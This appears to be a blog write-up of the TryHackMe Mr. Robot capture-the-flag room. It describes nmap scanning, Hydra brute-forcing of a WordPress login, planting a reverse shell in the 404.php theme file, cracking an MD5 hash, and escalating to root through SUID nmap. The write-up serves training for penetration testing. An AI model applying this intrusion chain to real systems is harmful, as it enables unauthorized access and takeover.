TryHackMe — Mr. Robot CTF Writeup
In this second blog of my series, I’ll be diving into the Mr. Robot CTF on TryHackMe as part of my preparation for the OSCP. Inspired by the popular TV show, this challenge is designed to test a wide range of skills. I’ll explain the steps I took and highlight the key lessons learned along the way.
Let’s get started!
Enumeration
As always, I started with a quick nmap scan to identify open ports, services, and versions running on the target machine.
nmap -A -T4 -Pn 10.10.1.110- -A: Enable OS detection, version detection, script scanning, and traceroute
- -T4: Aggressive timing template for faster execution
- -Pn: Treat all hosts as online — skip host discovery
We get the following results showing that port 22 (ssh) is closed while port 80 and 443 are open
Before diving into the investigation of the web page on port 80, I decided to run a deeper nmap scan to ensure that nothing is missed.
From the results, it looks like the scan revealed some interesting directories and files that we need to look into.
Upon inspecting each of these findings, we uncovered valuable information. The robots.txt file contained the first key and a wordlist file, which might include some credentials.
We proceed by downloading these files for further analysis and successfully submitted our first key!
Before investigating the wordlist we obtained, I decided to check the /license file.
we found an amusing comment from the developer. However, when viewing the page source of the content, we discovered credentials encoded in base64.
Upon decoding, we found what appears to be the credentials for the WordPress login.
However, even though we found these credentials, I’d still prefer to brute-force the login using the wordlist we obtained.
We first checked the word count per line of the wordlist, then sorted it and removed any duplicate entries to reduce the time spent waiting.
Web-Exploit
Now one thing to note about WordPress is that the login messages differ based on whether the specified username exists or not. This can be quite specific and useful for identifying valid usernames.
We will use Burp Suite to intercept our requests and gather the necessary information for our brute-force attack
The highlighted section will be used along with the initial information. We will use Hydra to brute-force the usernames first.
Now that we have the username, we’ll use a similar approach to brute-force the password, with a few adjustments.
We obtained the password, which turned out to be the exact one found in the /licensefile. This allowed us to successfully log in as an admin!
After spending some time navigating through the site, I attempted to upload a reverse shell via the plugin page, but it didn’t work. I referred to HackTricks for assistance.
I went to Appearance >> Editor >> 404.php and replaced the existing code with the code provided by HackTricks.
We then set up Netcat to listen for incoming connections and tried to access the updated page to execute our remote code execution (RCE).
As a rule of thumb, whenever we establish a successful remote connection, we create a stable shell for better interaction and reliability.
Privilege Escalation
We then ran the usual commands whoami, id, and sudo -l to gather information about the user and check for any sudo privileges, but found nothing interesting.
However, we discovered a user named Robot located in /home. The user's file contained the second key, which requires permission, and a password hashed in MD5 for the user Robot.
We will use Hashcat to crack the MD5 password hash.
Decrypting the password reveals abcdefghijklmnopqrstuvwxyz
Next, we switch to the Robot user using the decrypted password to retrieve the key. We then run the usual commands to gather information.
Unfortunately, the Robot user can't run any sudo commands. However, that's okay; we can use linPEAS to perform a detailed privilege escalation enumeration.
On the linPEAS report, one notable finding was that nmap has the SUID bit set, allowing it to run with root privileges. We can leverage nmap’s interactive mode to spawn a root shell. The hint for this technique was provided by GTFObins.
We took advantage of nmap’s interactive mode to gain root access and retrieve our final key.
Lesson Learned
- When we inspected our findings from a deep nmap scan, we uncovered valuable information that provided a good starting point for the challenge.
- This challenge can be approached and solved in different ways, emphasizing the importance of exploring various techniques and methods.
- Always utilize handy websites like HackTricks and GTFObins to aid in solving challenges. They provide useful hints and techniques that can be crucial for success.